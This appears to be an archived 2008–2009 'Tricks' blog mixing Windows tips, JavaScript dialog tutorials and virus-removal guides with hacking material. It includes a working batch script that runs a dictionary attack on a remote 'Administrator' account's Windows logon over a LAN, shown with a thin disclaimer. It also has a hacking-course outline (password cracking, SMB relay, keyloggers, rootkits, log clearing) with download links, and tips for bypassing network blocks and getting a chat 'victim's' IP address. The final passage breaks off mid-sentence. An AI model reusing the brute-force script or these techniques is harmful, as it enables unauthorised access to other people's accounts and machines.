Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Thursday, September 24, 2009

Prevent PenDrive Virus

Prevent PenDrive Virus
:: Do the following ::

1) Disable autorun/autoplay function of your pen drive.

2) Now plugin your pen drive and open any folder of your computer.
(Do not open any folder from ur pen drive.)

3) Now goto tools then select Folder Option
In that box mark the Show Hidden Files & Folders option.
Also Uncheck Hide Extension for known file types & Hide Protected OS files.

Now click apply and ok buttons and close that folder.

4) Nome come to desktop.
On the Desktop, click on windows Start button and select Search for files & folders.

When the search dialog box appears on the screen, in that click on All Files & Folders, now click on More Advanced Options then select search Hidden files & folders.

Now go above & in Look In option, select your pendrive letter (For example E: Or G:)
and hit Enter.

5) Now if you see any unknown .Exefiles, simply delete them all.

Enabling right click on sites that disable it

Enabling right click on sites that disable it
Lots of web sites have disabled the right click function of the mouse button… it’s really, really annoying. This is done so that you don’t steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It’s easy to change, assuming your using IE 6:
Click “Tools”->”Internet Options”
Click the “Security” tab
Click “Custom Level”
Scroll down to the “Scripting” section
Set “Active Scripting” to “disable”
Click “Ok” a couple of times.

You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website.

Open ORKUT IN BLOCKED PC

hi friends u can open any types of websites from following links if it banned..
enjoy

*www.mathtunnel.com
*www.gravitywars.com
*www.kproxy.com
*www.calculatepie.com
*http://www.anonymizer.com/

Open the above sites and just type in http://www.orkut.com in companies or colleges where its blocked n enjoy

how to create con folder

CON is a reserve world in windows operating system.
that’s why we can not create the folder named as
CON.

But by command prompt we can do this

STEP1: goto command prompt
STEP2: type in prompt e:\> “mkdir \\.\e:\con”
STEP3: verify by typing “dir \\.\e:\con”
STEP4: delete the file or folder “rmdir \\.\e:\con”

ollowing file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or “waste bit bucket” or “black hole for bits” or “/dev/null” device

Such files are considered to “exist” in all directories, so if you have a filename like “c:\temp\con”, you’re talking about the CON device, not about a normal disk file called “con”. They’re not listed using the “dir” command, or using APIs.

Use chkdsk To Repair Hard Drive Problems

Using a PC regularly also means maintaining it. Sometimes hard drive problems cause the computer to run slow or hang. In bad cases a hard drive makes cranking noises which do not sound like the normal clicks a they usually make while reading or writing data. There may be messages at boot time that give warnings. This is a common one:

Smart Failure predicted on hard disk.
Warning: Immediately backup all data and replace hard disk. A failure may be imminent. Press F1 to continue.

If you are experiencing any of these problems, it never hurts to run a program called Check Disk which scans for errors and can automatically repair them. Just be patient because this process can take at least 15 to 20 minutes or longer if a lot of damage needs to be fixed. Even without any obvious signs, it still might be a good idea to use this feature just to be on the safe side.

Here are the step-by-step instructions:

  1. Click “Start”
  2. Click “Run…”
  3. Where it says “Open:” type the following: cmd
  4. Click “OK”
  5. You will see a black screen with a blinking cursor. This is the command prompt. Use it to type the
  6. following command: chkdsk /r /f

    Then press “Enter”. If you Have done this correctly, you should see this:

    C:\Documents and Settings\User>chkdsk /r /f
    The type of the file system is NTFS.
    Cannot lock current drive.

    Chkdsk cannot run because the volume is in use by another
    process. Would you like to schedule this volume to be
    checked the next time the system restarts? (Y/N)

  7. Type Y where it says (Y/N) to answer yes to the question. Reboot your computer and your hard drive will be scanned for errors before Windows loads. Be patient as this can take 15 to 20 minutes, even up to 60 minutes if there are a lot of files with bad clusters which need to be replaced.

Let The Light Flash On Your KeyBoard

these codes when executed makes your Caps,Num,Scroll lock keys flash..
very kewlll…i hav tried it…

1.This piece of code makes ur keyboard a live disco…

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instrcuctions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*to stop, launch task manager and then under “Processes” end wscript.exe

Use Gmail Generate Unlimited E-mail Addresses

Gmail has an interesting quirk where you can add a plus sign (+) after your Gmail address, and it’ll still get to your inbox. It’s called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here’s how it works: say your address is pinkyrocks@gmail.com, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it pinkyrocks+work@gmail.com and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to pinkyrocks+work@gmail.com. Then add the label work).

More real world examples:

Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use
pinkyrocks+nytimes@gmail.com for nytimes.com
pinkyrocks+freestuff@gmail.com for freestuff.com
Then you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail: I’ve talked about that above.

Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don’t check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give pinkyrocks+mailinglist1@gmail.com as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

Update (9/7): Several commentors have indicated that this is not a Gmail specific trick. kl says Fastmail has enabled this feature as well. caliban10 reports that a lot of sites reject addresses with a plus sign. You might use other services like Mailinator for disposable addresses instead. pbinder recommends using services like SpamGourmet, which redirects mail to your real address.

Remove Brontok Virus Urself

Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v “DisableRegistryTools”
and run HKLM\software\microsoft\windows\currentversion\policies\system /v “DisableRegistryTools”

after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run

on the right side delete the entries which contain ‘Brontok’ and ‘Tok-’ words.

after that restart ur system
open registry editor and follow the path to enable folder option in tools menu

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ ‘NoFolderOption’
delete this entry and restart ur computer

and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.

ur computer is completely free from virus brontok

XPHacking With Windows XP

So you have the newest, glitziest, “Fisher Price” version of Windows: XP. How
can you use XP in a way that sets you apart from the boring millions of ordinary
users?

The key to doing amazing things with XP is as simple as D O S. Yes, that’s
right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as
well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS
version. Various versions of command.com come with Windows 95, 98, SE, ME,
Window 3, and DOS only operating systems.

The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually
cmd.exe is better than command.com because it is easier to use, has more
commands, and in some ways resembles the bash shell in Linux and other Unix-type
operating systems. For example, you can repeat a command by using the up arrow
until you back up to the desired command. Unlike bash, however, your DOS command
history is erased whenever you shut down cmd.exe. The reason XP has both
versions of DOS is that sometimes a program that won?t run right in cmd.exe will
work in command.com

note : m not comparing bash to dos

DOS is your number one Windows gateway to the Internet, and the open sesame to
local area networks. From DOS, without needing to download a single hacker
program, you can do amazingly sophisticated explorations and even break into
poorly defended computers.

****************
You can go to jail warning: Breaking into computers is against the law if you do
not have permission to do so from the owner of that computer. For example, if
your friend gives you permission to break into her Hotmail account, that won’t
protect you because Microsoft owns Hotmail and they will never give you
permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for
bringing up a DOS prompt on a computer. Be sure to get a teacher’s WRITTEN
permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying
something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type
“help” at the DOS prompt, it gives you a long list of commands. However, this
list leaves out all the commands hackers love to use. Here are some of those
left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can
guess by the name, TCP/IP is the protocol under which the Internet runs. along
with user datagram protocol (UDP). So when you are connected to the Internet,
you can try these commands against other Internet computers. Most local area
networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate
between computers. This is often used by Windows computers, and by Unix/Linux
type computers running Samba. You can often use NetBIOS commands over the
Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,
NetBIOS commands will be blocked by firewalls. Also, not many Internet computers
run NetBIOS because it is so easy to break in using them. I will cover NetBIOS
commands in the next article to XP Hacking.

The queen of hacker commands is telnet. To get Windows help for telnet, in the
cmd.exe window give the command:

C:\>telnet /?

Here’s what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]

-a Attempt automatic logon. Same as –l option except uses the currently logged
on user’s name.
-e Escape character to enter telnet cclient prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system. Requires that
the remote system support the TELNET ENVIRON option.
-t Specifies terminal type. Supportedd term types are vt100, vt52, ansi and vtnt
only.
host Specifies the hostname or IP address of the remote computer to connect to.
port Specifies a port number or service name.

****************
Newbie note: what is a port on a computer? A computer port is sort of like a
seaport. It’s where things can go in and/or out of a computer. Some ports are
easy to understand, like keyboard, monitor, printer and modem. Other ports are
virtual, meaning that they are created by software. When that modem port of
yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has
the ability to open or close any of over 65,000 different virtual ports, and has
the ability to connect to any of these on another computer – if it is running
that port, and if a firewall doesn?t block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two
ways: by number or by name.
****************

The simplest use of telnet is to log into a remote computer. Give the command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to
telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may get the
message:

login:

Type your user name here, making sure to be exact. You can’t swap between lower
case and capital letters. For example, user name Guest is not the same as guest.

****************
Newbie note: Lots of people email me asking how to learn what their user name
and password are. Stop laughing, darn it, they really do. If you don’t know your
user name and password, that means whoever runs that computer didn’t give you an
account and doesn’t want you to log on.
****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn’t work?

Every day people write to me complaining they can’t telnet. That is usually
because they try to telnet into a computer, or a port on a computer that is set
up to refuse telnet connections. Here’s what it might look like when a computer
refuses a telnet connection:

C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3…Could not open connection to the host, on port 23. A
connection attempt failed because the connected party did not properly respond
after a period of time, or established connection failed because connected host
has failed to respond.

Or you might see:

C:\ >telnet hotmail.com
Connecting To hotmail.com…Could not open connection to the host, on port
23. No connection could be made because the target machine actively refused it.

If you just give the telnet command without giving a port number, it will
automatically try to connect on port 23, which sometimes runs a telnet server.

**************
Newbie note: your Windows computer has a telnet client program, meaning it will
let you telnet out of it. However you have to install a telnet server before
anyone can telnet into port 23 on your computer.
*************

If telnet failed to connect, possibly the computer you were trying to telnet
into was down or just plain no longer in existence. Maybe the people who run
that computer don’t want you to telnet into it.

Even though you can’t telnet into an account inside some computer, often you can
get some information back or get that computer to do something interesting for
you. Yes, you can get a telnet connection to succeed -without doing anything
illegal –against almost any computer, even if you don’t have permission to log
in. There are many legal things you can do to many randomly chosen computers
with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables
encrypted connections between computers. If you want to SSH into an account
there, you can get a shell account for free at http://freeshell.org . You can
get a free SSH client program from http://winfiles.com .

***************
You can get punched in the nose warning: Your online provider might kick you off
for making telnet probes of other computers. The solution is to get a local
online provider and make friends with the people who run it, and convince them
you are just doing harmless, legal explorations.
*************

Sometimes a port is running an interesting program, but a firewall won’t let you
in. For example, 10.0.0.3, a computer on my local area network, runs an email
sending program, (sendmail working together with Postfix, and using Kmail to
compose emails). I can use it from an account inside 10.0.0.3 to send emails
with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer, here’s what
happens:

C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3…Could not open connection to the host, on port 25. No
connection could be made because the target machine actively refused it.

However, if I log into an account on 10.0.0.3 and then telnet from inside to
port 25, here’s what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun…
cmeinel@test-box:~> telnet localhost 25
Trying ::1…
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1… [Carolyn's note: 127.0.0.1 is the numerical address meaning
localhost, the same computer you are logged into]
Connected to localhost.
Escape character is ‘^]’.
220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep people from
using it to try to break in or to forge email. Now the ubergeniuses reading this
will start to make fun of me because no Internet address that begins with 10. is
reachable from the Internet. However, sometimes I place this “test-box” computer
online with a static Internet address, meaning whenever it is on the Internet,
it always has the same numerical address. I’m not going to tell you what its
Internet address is because I don’t want anyone messing with it. I just want to
mess with other people’s computers with it, muhahaha. That’s also why I always
keep my Internet address from showing up in the headers of my emails.

***************
Newbie note: What is all this about headers? It’s stuff at the beginning of an
email that may – or may not – tell you a lot about where it came from and when.
To see full headers, in Outlook click view -> full headers. In Eudora, click the
“Blah blah blah” icon.
****************

Administrator Password Guessing
Performing Automated Password Guessing
Legion
NTInfoScan
Defending Against Password Guessing
Monitoring Event Viewer Logs
VisualLast
Eavesdroppin on Network Password Exchange
Hacking Tool: L0phtCrack
Hacking Tool: KerbCrack
Privilege Escalation
Hacking Tool: GetAdmin
Hacking Tool: hk
Manual Password Cracking Algorithm
Automatic Password Cracking Algorithm
Password Types
Types of Password Attacks
Dictionary Attack
Brute Force Attack
Distributed Brute Force Attack
Password Change Interval
Hybrid Attack
Cracking Windows 2000 Passwords
Retrieving the SAM file
Redirecting SMB Logon to the Attacker
SMB Redirection
Hacking Tool: SMBRelay
Hacking Tool: SMBRelay2
SMBRelay Man-in-the-Middle (MITM)
SMBRelay MITM Countermeasures
Hacking Tool: SMBGrinder
Hacking Tool: SMBDie
Hacking Tool: NBTDeputy
NetBIOS DoS Attack
Hacking Tool: nbname
Hacking Tool: John the Ripper
LanManager Hash
Password Cracking Countermeasures
Keystroke Logger
Hacking Tool: Spector
AntiSpector
Hacking Tool: eBlaster
Hacking Tool: SpyAnywhere
Hacking Tool: IKS Software Logger
Hardware Tool: Hardware Key Logger
Hacking Tool: Rootkit
Planting Rootkit on Windows 2000 Machine
_rootkit_ embedded TCP/IP Stack
Rootkit Countermeasures
MD5 Checksum utility
Tripwire
Covering Tracks
Disabling Auditing
Auditpol
Clearing the Event Log
Hacking Tool: Elslave
Hacking Tool: Winzapper
Hacking Tool: Evidence Eliminator
Hidding Files
NTFS File Streaming
Hacking Tool: makestrm
NTFS Streams Countermeasures
LNS
Steganography
Hacking Tool: ImageHide
Hacking Tool: MP3Stego
Hacking Tool: Snow

http://rapidshare.com/files /99865070/System_Hacking.part03.rar


http://rapidshare.com/files/99870408/System_Hacking.part02.rar


http://rapidshare.com/files/99867492/System_Hacking.part01.rar

Enabling & disabling the USB port in windows via registry.

As per the Microsoft knowledge base article 823732 which

contains instructions on how to disable USB storage access

for a certain group of users this disabling and re-enabing

of USB ports is based on a simple registry entry.

To disable the access to USB port, in windows XP and 2000:

1. Click Start, and then click Run.

2. In the Open box, type regedit, and then click OK.

3. Locate, and then click the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Services\UsbStor

4. In the right pane, double-click Start.

5. In the Value data box, type 4, click Hexadecimal

(if it is not already selected), and then click OK.

6. Quit Registry Editor.

To re-enable a disabled port:

1. Click Start, and then click Run.

2. In the Open box, type regedit, and then click OK.

3. Locate, and then click the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Services\UsbStor

4. In the right pane, double-click Start.

5. In the Value data box, type 3, click Hexadecimal

(if it is not already selected), and then click OK.

6. Quit Registry Editor.

However, there can be other ways too to bypass this issue,

one of the easiest is to invest in a PS2 to USB port convertor.

Setting wallpaper in USB Drive

Bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background.

for that you need the following piece of code:

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=c.bmp
IconArea_Text=0×00000000

copy and paste it in a notepad file, and specify the image file name ( here it is c.bmp), then save it in your memory stick as desktop.ini also you are supposed to keep the image file on the memory stick.

refresh and view the background.

LAN Remote user – Dictionary Attack

Use this Batch file to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully.

Just Follow the steps below,

1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with .bat extension.

@echo off
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo
*****Done*****

3. Make sure that you have a Dictionary Password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username.

The Syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02 Administrator

Where,

LANbrute.bat – This is the Name of the batch file that resides in the C Drive.

192.169.21.02 – IP Address of the Target Computer.

Administrator – Victim Account that you want to crack.

5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right match.

6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory.

//Disclaimer : This is only meant for Educational Means, The members of this site is not responsible for whatever you do with this. //

Orkut Hacks

As I’m Orkut user I like these sites and Orkut hacks on it, the following are some of my collection regarding Orkut hacks

1) Zeetab(Orkut Star) – Computer World, Orkut Computer Tips and Tricks, Free Sms, Wallpaper, Mobile Software Game Ringtone Themes, Free games, Orkut Software, Bollywood wallpaper, MP3, FM Rradio and many more

2) Thisisorkut.org (TIO) – This Is Orkut (T.I.O) was created to provide more info and help tracks to Orkut users for their convenience. Easy to use Java Scripts, Online Toolbars, Help References, Trouble shooters, and lot more….

3) CrazySouls.com – Crazy souls have created many orkut scripts and they are really useful and working. Not only scripts they also profide stuffs for MSN, Cheets and many more

4) Trickfriend.com – Here, on this website, you will find tips and tricks that will help in making your life easier on Orkut. This webpage also contains many sftware related to Orkut

5) Tools Home – This site is developed by 15 yr Old boy, this site contains some cool stuffs and software

6) ScrapMania.com – This site provide services like Messages, Generators, ASCII Art, Bar Arts, Images, Emotions, Smailies and many more

7) Orkut Underworld – This is blog which have awesome collection of orkut tips and tricks, softwares and many more. In short simple blog but useful blog

8) Orkutrix.com – In the world of Orkut tricks! You find only GENUINE and popular orkut tricks and scripts here. Browse through the menu for those tricks but they also provide some hacking tricks of orkut

9) InsideOrkut.com – According to me this is the best of all because this website posts all the current information in orkut, this website is very useful for begineers and also for everyone

10) OrkutPlus! – Orkut plus is really a Plus to Orkut they are providing Best Compilation of Orkut Hacks, Tips-Tricks and Cheat Scripts ! as they are publishing

11) Devils workshop – This blog contains not only tips and tricks for Orkut it also having some best collection for My space, You tube, Google, Ad sense, and many more. More over I like the labels cloud on that blog

12) Digital Me – this blog just started before 2 months but it contains wide range of softwares, Java scripts, GM scripts, etc..

I’m still having many collection of website but this dozen of sites will do all what you want to known about orkut, so it wont be useful even if I provide more, from this website you can communication in orkut reaches next generation

Wednesday, February 25, 2009

Remember: Markup goes into the BODY of your page and Scripts
go into the JavaScript Section, located in the HEAD of your page ...

The Alert Dialog Box

Image of a JavaScript Alert Popup Box

The JavaScript Alert is the simplest and the most often used of the three available JavaScript pop-up dialog boxes. It's one simple job is to display a message to the user. When the browser reaches the point in the script that triggers the Alert, the Alert popup box is displayed on the screen and all other operations are suspended until the user confirms they have read the message by clicking the 'OK' button. It is obviously useful for displaying a message to the user but it is also very useful for debugging JavaScript scripts. You place it inline in the script you are developing and use it to display the value of variables, form input fields, etc.

There are many different ways you can call an Alert but we are going to use a JavaScript link that calls a JavaScript function called 'javascript_alert_demo', which in turn will prepare and call the Alert built-in function. You should note that an Alert requires one argument (the message) and it returns no value.

Markup for a link that calls the 'javascript_alert_demo' function ...

JavaScript Alert Popup Demo

Script for the 'javascript_alert_demo' function ...

function javascript_alert_demo() {

// ALERTS REQUIRE ONE ARGUMENT
var message = "Remember to log out before exiting...";

// ALERTS DO NOT RETURN A VALUE
// ALERTS ARE INFORMATIONAL ONLY
alert (message);
}

Click this link for a demonstration ...

There is no return value from a JavaScript Alert call ...

The Confirm Dialog Box

24-Oct-2008: Script updated to deal with cross-browser issues.

Image of a JavaScript Confirm Popup Box

The JavaScript Confirm is similar to an Alert in that it accepts one argument (the message) but instead of just having an 'OK' button it has both an 'OK' button and a 'Cancel' button. This allows you to ask the user Yes|No type questions and then make your script branch according to the users response. When the browser reaches the point in the script that calls the Confirm, the Confirm box is displayed on the screen and all other operations are suspended until the user reacts to the Confirm.

To enable you test a users response a Confirm returns a boolean 'true' if the user clicks 'OK' or types 'Return' and it returns a boolean 'false' if the user clicks 'Cancel' or types 'Escape'. Again, we have used a JavaScript link, this time to call a JavaScript function called 'javascript_confirm_demo' which in turn will prepare and call the Confirm built-in function and then deal with the returned value.

Markup for a link that calls the 'javascript_confirm_demo' function ...

JavaScript Confirm Popup Demo

Markup for the form that displays the returned value from the confirm ...




Script for the 'javascript_confirm_demo' function ...

function javascript_confirm_demo(formID) {

if (document.getElementById(formID)) {
var form = document.getElementById(formID);
} else {
return;
}

// CONFIRM REQUIRES ONE ARGUMENT
var message = "Please confirm it is OK to proceed...";

// CONFIRM IS BOOLEAN. THAT MEANS THAT
// IT RETURNS TRUE IF 'OK' IS CLICKED
// OTHERWISE IT RETURN FALSE
var return_value = confirm(message);

// DISPLAY THE RETURNED VALUE IN THE
// CONFIRM POPUP DEMO TEXT INPUT BOX
form.return_value.value = return_value;

// TEST TO SEE IF TRUE|FALSE RETURNED
if ( return_value === true ) {
// YOUR 'OK' SCRIPT GOES HERE
yourOkFunction();
} else {
// YOUR 'CANCEL' SCRIPT GOES HERE
yourCancelFunction();
}
}

click this link for a demonstration ...

the last returned value from your Confirm Popup Demo ...

The Prompt Dialog Box

24-Oct-2008: Script updated to deal with cross-browser issues.

Image of a JavaScript Prompt Popup Box

The JavaScript Prompt is the most complex of the three JavaScript popup dialog boxes in that it requires two arguments and returns two different classes of response. The first argument is the message that is to be displayed to the user and in our example we have specified 'Please Enter Your Correct Name'. The second argument is the current (starting) value of the input line and in our example we have specified 'Mary'. The idea of the example is that if the users name is not Mary then we are inviting the user to edit the input box and enter their correct name. If you don't require a starting value for the input line then you should set the second argument to an empty string (e.g. var user_name = ""). Do not ignore the second argument otherwise the starting value of the input line will be 'undefined'.

The two classes of response that are returned by a JavaScript Prompt are a null string if the user clicks 'Cancel' or types 'Escape' and a valid string containing the text from the input line if the user clicks 'OK' or types 'Return'. If there is no text on the input line when the user clicks 'OK' or types 'Return' then an empty 'valid' string is returned.

As with the other JavaScript popups, when the browser reaches the point in the script that calls the Prompt, the Prompt popup box is displayed on the screen and all other operations are suspended until the user reacts to the Prompt. Yet again we have used a JavaScript link, this time to call a JavaScript function called 'javascript_prompt_demo' which in turn will prepare and call the Prompt built-in function and then deal with the returned values.

Markup for the link that calls the 'javascript_prompt_demo' function ...

JavaScript Prompt Popup Demo

Markup for the form that displays the returned value from the prompt ...




Script for the 'javascript_prompt_demo' function ...

function javascript_prompt_demo(formID) {

if (document.getElementById(formID)) {
form = document.getElementById(formID);
} else {
return;
}

// PROMPTS REQUIRE TWO ARGUMENTS
var message = "Please enter your first name...";
var user_name;
if (form.return_value.value.length > 0) {
user_name = form.return_value.value;
} else {
user_name = "Mary";
}

// PROMPTS RETURN TWO POSSIBLE VALUES
// IF THE USER TYPES ESCAPE OR CLICKS CANCEL
// THE RETURN VALUE IS NULL
// IF THE USER TYPES RETURN OR CLICKS OK
// THE INPUT LINE STRING IS RETURNED
var return_value = prompt(message,user_name);

// DISPLAY THE RETURNED VALUE IN THE
// PROMPT DEMO TEXT INPUT BOX
if (return_value !== null) {
form.return_value.value = return_value;
}

// TEST TO SEE IF NULL OR STRING RETURNED
if (return_value !== null) {
// YOUR 'OK' SCRIPT GOES HERE
yourOkFunction();
} else {
// YOUR 'CANCEL' SCRIPT GOES HERE
yourCancelFunction();
}
}

click this link for a demonstration ...

the last returned value from your Prompt Popup Demo ...

Hey u can do it your self REMOVE VIRUS


1. Check msconfig it will tell u the path of your virus in your stat up
2. search that file "file name.exe".
3. use this script write it in your notepad and kill that virus
4. script save it as antivirus
5.

'code start frm here
r=InputBox("Enter your process","")
for each Process in GetObject("winmgmts:{impersonationLevel=impersonate,(Debug)}").InstancesOf("win32_process")
If Process.Name = r Then
Process.Terminate Process.ProcessID
MsgBox "Process terminated"
End If
next
'code end here


save it as cool.vbs
and just double click it
it will show u a msg box name that "filename.exe"
if it show "Process terminated"
then virus process is gone
now just delete that virus folder frm ur pc which u hav search

HOW TO REMOVE VIRUS MANUALLY.


Tools required

1.restriction removal tool
link: http://www.softpedia.com/get/Security/Security-Related/RRT-Remove-Ristrictions-Tool.shtml

2.unhackme
http://www.greatis.com/unhackme/download.htm

3.hijackthis
http://filehippo.com/download_hijackthis/
http://www.download.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html

4.process explorer
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx



If your pc is affected with some virus the most common of all is your folder otion will be disabled,you may not be able to open task manager, etc etc..


now 1st step is to identify the virus process
process explorer will help u and u may see the path of the installed file on ur system

now use restriction removal tool to remove the task bar ..folder option restrictions...etc...

now our aim is to remove the running virus process..
use hijackthis and select the virus process. it will remove the process from startup registry also..

finally try unhacme.. to remove the rootkits


many virus can be removed in this way but many still remain on ur pc.. in such situations.. try to google for its removal methods manually.. once the restrictions are removed u may be able to use taskmanager and able to use regedit command

regards
nitin



---------------------------------------------
Hard work never killed anybody, but why take a chance?t why take a chance?

Saturday, December 13, 2008

ιρ ωнιℓє ¢нαттιηg!

ソα υ ¢αη gєт тнє ιρ ωнιℓє ¢нαттιηg.. ωнιℓє ¢нαттιηg gσ ιη ∂σѕ αη∂ тнєя ιѕ α ¢σммαη∂ ι.є ηєтѕтαт- η тнιѕ ¢σммαη∂ ωιℓℓ σηℓソ ωσяк ιƒ тнєя ια α ∂ιяє¢т ¢σηηє¢тιση/ℓιηк вєтωєєη ソσυ αη∂ тнє σтнєя ρєяѕση. ι.є. ιη ι¢q(σℓ∂ мєѕѕєηgєя) [ ∂ιяє¢т ℓιηк/¢σηηє¢тιση ] ソσυя ѕソѕтєм--------------------------------------νι¢тιмѕ ѕソѕтєм ιη ι¢q.. тнєя ιѕ α ∂ιяє¢т ℓιηк вєтωєєη ソσυ αη∂ тнє νι¢тιη...ι.є. ωнєη υ ѕєη∂ мєѕѕαgє ιт gσєєѕ ∂ιяє¢тℓソ тσ тнє νι¢тιη αη∂ ιƒ нє/ѕнє ѕєη∂ тнє мєѕѕαgє тнєη ιт ιѕ ∂ιяє¢тℓソ ∂єℓινєя∂ 2 υ...αη∂ тнєя ιѕ ησ σтнєя ѕєяνєя ιη вєтωєєη. ѕσ υ ¢αη נυѕт тソρє тнт ¢σммαη∂ ιη ∂σѕ αη∂ gєт тнє νι¢тιмѕ ιρ ιƒ υ υѕιηg ι¢q. вυт ιƒ υ υѕιηg мѕη , ソαнσσ , gтαℓк єт¢ (αℓℓ ηєω мєѕѕєηgєя) [ ιη∂ιяє¢т ℓιηк/¢σηηє¢тιση ] ソσυя ѕソѕтєм--------------(ѕєяνєя)--------------νι¢тιмѕ ѕソѕтєм ιη тнєѕє мєѕѕєηgєя... тнєя ιѕ ησт α ∂ιяє¢т ℓιηк вєтωєєη ソσυ αη∂ тнє νι¢тιη...ι.є тнєя ιѕ αη ιη∂ιяє¢т ℓιηк....мєαηѕ тнєя ιѕ α ѕєяνєя ιη вєтωєєη...ι.є. ωнєη υ ѕєη∂ мєѕѕαgє ιт gσєѕ тσ тнє ѕєяνєя 1ѕт αη∂ тнєη ιт gσєѕ 2 тнє νι¢тιη αη∂ ιƒ нє/ѕнє ѕєη∂ѕ тнє мєѕѕαgє тнєη αℓѕσ ιт 1ѕт gσєѕ тσ тнє ѕєяνєя тнєη ∂єℓινєя∂ 2 υ.... ѕσ υ ¢αηησт נυѕт тソρє тнт ¢σммαη∂ ιη ∂σѕ αη∂ gєт тнє νι¢тιмѕ ιρ ...вє¢αυѕє ιт υ ∂σ тнт тнєη ソσυ ωσυℓ∂ gєт тнє ιρ σƒ тнє ѕєяνєя....тнєη ωαт 2 ∂σ! ソσυ ¢αηησт gєт тнє νι¢тιмѕ ιρ ωι∂συт α ∂ιяє¢т ℓιηк σя ∂ιяє¢т ¢σηη.....υ нανє 2 нανє тнт... ѕσ ƒσя gєттιηg α ∂ιяє¢т ¢σηηє¢тιση ソσυ ¢αη ∂σ тнє ƒσℓℓσωιηg тнιηgѕ... 1) ∂σ ηєтѕтαт-η ∂υяιηg ωнєη 